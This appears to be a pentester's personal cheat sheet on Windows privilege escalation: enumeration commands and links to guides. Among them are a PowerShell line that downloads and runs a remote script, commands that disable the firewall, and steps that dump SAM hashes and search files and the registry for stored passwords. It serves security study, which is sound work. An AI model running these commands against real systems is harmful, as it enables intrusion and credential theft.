Windows
Monday, August 17, 2020
3:12 PM Backlink: reference-notes-readme
Enumeration Guides
Windows Privilege Escalation Guide
FuzzySecurity | Windows Privilege Escalation Fundamentals
Windows elevation of privileges
OSCP-note/Windows_commands at master · R0B1NL1N/OSCP-note · GitHub
Local AD Abuse
Retrieve Deleted Items
Get-ADObject -filter ‘isDeleted -eq $true’ -includeDeletedObjects -Properties *
Remote Script Execution
Use the following to source and execute a file from a remote HTTP server on the local Windows machine:
$webclient=(New-Object Net.WebClient);$webclient.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $webclient.DownloadString("http://...")
Privesc Enum Scripts
Sherlock - Run with "Find-AllVulns" to check for MSxxxxx style kernel exploit vulnerabilities.
PowerUp.ps1 - Run with "Invoke-AllChecks" to check for various exploit vulnerabilities similar to linux smart enum etc.
systeminfo - Get full systeminfo to feed into WinPrivescChecker.
Windows Privesc Commands
AV Enumeration
List AV products in PowerShell:
Get-CimINstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct
To list AV products using WMIC in a CMD prompt:
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
Windows System Information
Get Windows Version and Configuration
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
Extract patches and updates
wmic qfe
Get Architecture
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%
List all env variables
set
Get-ChildItem Env: | ft Key,Value
List all drives
wmic logicaldisk get caption || fsutil fsinfo drives
wmic logicaldisk get caption,description,providername
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
User/Group Information
Check user privileges
whoami /priv
Multiple Methods to list all users
net user
whoami /all
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
List logon requirements, helpful for brute-forcing.
net accounts
Get details about user
net user <username>
List all local groups
net localgroup
Get-LocalGroup | ft Name
Get details about a group
net localgroup administrators
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
Network Enum
List all interfaces, IP info, DNS.
ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
List current routing table
route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
List ARP table
arp -A
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
Get current connections
netstat -ano
List firewall info
netsh advfirewall firewall dump
netsh firewall show state
netsh firewall show config
List ports blocked by firewall.
$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports
Disable firewall
netsh firewall set opmode disable
netsh advfirewall set allprofiles state off
List all network shares
net share
View SNMP configuration
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
EoP Enum
SAM/SYSTEM Files
The Security Account Manager (SAM), often Security Accounts Manager, is a database file. The user passwords are stored in a hashed format in a registry hive either as a LM hash or as a NTLM hash. This file can be found in %SystemRoot%/system32/config/SAM and is mounted on HKLM/SAM.
%SYSTEMROOT% = C:\Windows # Usually
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
Generate a hash file for John using pwdump or samdump2.
pwdump SYSTEM SAM > /root/sam.txt
samdump2 SYSTEM SAM -o sam.txt
Then crack it with john -format=NT /root/sam.txt.
Search for files contents
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config
findstr /spin "password" *.*
Search for file with specific filename
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini
Search registry for key names and passwords
REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # SNMP parameters
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Putty clear text proxy credentials
reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
Read a value of a certain sub key
REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList
Passwords can be found in unattended.xml sometimes, stored in b64
C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
Display the content of these files with
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
Helpful Bash-like commands
ipconfig == ifconfig == ip a
ipconfig /displaydns
tasklist == ps aux
netstat -na